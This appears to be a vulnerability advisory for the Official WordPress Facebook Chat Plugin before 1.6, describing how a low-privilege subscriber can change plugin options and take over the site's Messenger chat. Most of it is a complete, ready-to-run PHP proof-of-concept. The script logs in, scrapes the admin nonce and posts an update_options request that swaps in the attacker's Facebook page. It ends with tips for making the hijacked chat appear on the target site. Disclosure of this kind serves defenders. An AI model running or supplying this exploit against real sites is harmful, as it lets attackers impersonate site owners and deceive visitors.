The Official WordPress Facebook Chat Plugin < 1.6 – Authenticated Options Change to Chat Takeover

Description

This flaw made it possible for low-level authenticated attackers to connect their own Facebook Messenger account to any site running the vulnerable plugin and engage in chats with site visitors on affected sites.

Proof of Concept

Obtain PageID from a test Facebook Page (found under page - about - pageID). 

Use this script:

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$pageID = $argv[4];

// 1) Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/ajax_object\s=\s{"nonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'update_options',
    'pageID' => $pageID,
    'locale' => 'eng',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

Verify the PageID updated in the DB and verify that a chat initiates with your added page.

***If you are having issues getting messenger to pop-up on target site, add the domain to your Facebook page's Whitelisted Domains. This can be found by going to the Page > Settings > Advanced Messaging.